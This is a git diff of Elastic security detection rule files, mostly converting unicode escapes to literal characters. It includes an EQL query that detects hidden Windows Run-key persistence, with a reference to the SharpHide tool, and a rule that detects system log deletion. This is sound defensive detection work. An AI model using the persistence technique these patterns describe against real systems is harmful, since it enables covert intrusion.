b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json index 39b6aaa7884..4455d565759 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json index de620b211ca..ec4aa05d6e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -43,7 +43,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json index 8032c2eee4c..1899918f48d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json +++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json index 8cf5893a1a3..1c038193727 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json index b593acc4cad..cf11a9919b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json index 133643b46b4..3b97f4a963e 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json index e4eb0c6a662..8992479abbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json +++ b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json index c80d4cf2a4e..c39ca88be4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json +++ b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json index d07a6fa63ef..ebdfa72d0e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json index a5f8fd540b8..495bc6456f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json index 63e189d3b7b..76bf2e78a4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json index d88b1950f35..cb63ce8dec8 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Log File Deletion", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate 